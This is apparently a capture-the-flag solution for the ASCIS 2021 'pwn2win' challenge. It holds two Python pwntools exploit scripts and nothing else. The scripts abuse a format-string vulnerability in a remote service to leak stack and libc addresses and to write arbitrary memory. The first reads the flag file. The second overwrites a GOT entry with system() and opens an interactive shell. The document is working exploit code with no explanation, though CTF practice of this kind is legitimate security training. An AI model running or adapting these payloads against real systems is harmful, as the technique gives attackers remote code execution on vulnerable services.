ASCIS 2021 Qualification Round - pwn2win

exp.py

#!/usr/bin/env python3

from pwn import *

context.clear(arch='amd64', os='linux', endian='little')

r = remote('125.235.240.166', 33333)

# 1st boss
r.sendline(b'%p')

for i in range(6):
    r.sendlineafter(b'> ', b'2')
    r.sendline(str(0x11111111).encode('ascii'))

r.recvuntil(b'WINNER: ')
stack = int(r.recvline(), 16) + 0x2720
log.info('stack = 0x%x' % stack)

def fight(fmt):
    r.sendlineafter(b'(y/n) ', b'y')
    r.sendline(fmt.encode('ascii'))

    for i in range(8):
        r.sendlineafter(b'> ', b'2')
        r.sendline(str(0x11111111).encode('ascii'))

# 2nd boss
fight('%{:d}c%25$hn'.format((stack - 0x70 + 3) & 0xffff))

# 3rd boss
fight('%128c%53$hhn')

# loop variable has been set to a negative number
# now we have unlimited tries

def write(addr, value):
    log.info('Writing 0x%x to 0x%x', value, addr)
    for j in range(0, 8, 2):
        fight('%{:d}c%25$hn'.format((stack - 0x30 + j) & 0xffff))
        if (addr & 0xffff) == 0:
            fight('%53$hn')
        else:
            fight('%{:d}c%53$hn'.format(addr & 0xffff))
        addr = addr >> 16
    
    value = value & 0xffff
    if value == 0:
        fight('%16$hn')
    else:
        fight('%{:d}c%16$hn'.format(value))

write(0x602098 + 7, u16(b'./'))
write(0x602098 + 9, u16(b'fl'))
write(0x602098 + 11, u16(b'ag'))
write(stack - 0x74, 0)

r.sendlineafter(b'(y/n) ', b'y')
r.recvuntil(b'Name: ')
log.success(r.recvline().decode('ascii').strip())

exp_shell.py

#!/usr/bin/env python3

from pwn import *

context.clear(arch='amd64', os='linux', endian='little')
libc = ELF('./libc-2.31.so')

r = remote('125.235.240.166', 33333)

r.sendline(b'%p\n%23$p')

for i in range(6):
    r.sendlineafter(b'> ', b'2')
    r.sendline(str(0x11111111).encode('ascii'))

r.recvuntil(b'WINNER: ')
stack = int(r.recvline(), 16) + 0x2720
log.info('stack = 0x%x' % stack)
libc.address = int(r.recvline(), 16) - (libc.symbols['__libc_start_main'] + 0xf3)
log.info('libc = 0x%x' % libc.address)

def fight(fmt):
    r.sendlineafter(b'(y/n) ', b'y')
    r.sendline(fmt.encode('ascii'))

    for i in range(8):
        r.sendlineafter(b'> ', b'2')
        r.sendline(str(0x11111111).encode('ascii'))

def write_stack_near(addr, value, width='hn'):
    value = value & 0xffff
    log.info('Writing 0x%x to 0x%x', value, addr)
    if (addr & 0xffff) == 0:
        fight('%25$hn')
    else:
        fight('%{:d}c%25$hn'.format(addr & 0xffff))
    if value == 0:
        fight('%53$' + width)
    else:
        fight('%{:d}c%53${}'.format(value, width))

def write(addr, value):
    for j in range(2, 8, 2):
        write_stack_near(stack - 0x30 + j, addr >> (8 * j))
    
    for i in range(0, len(value), 2):
        write_stack_near(stack - 0x30, addr + i)
        val = u16(value[i:i+2])
        if val == 0:
            fight('%16$hn')
        else:
            fight('%{:d}c%16$hn'.format(val))

write_stack_near(stack - 0x70 + 2, 0x8000)

# loop variable has been set to a negative number
# now we have unlimited tries

write(0x602070, p64(libc.symbols['system']))
write(0x602098 + 7, b'/bin/sh\x00')

write_stack_near(stack - 0x74, 0)
r.sendlineafter(b'(y/n) ', b'y')
r.interactive()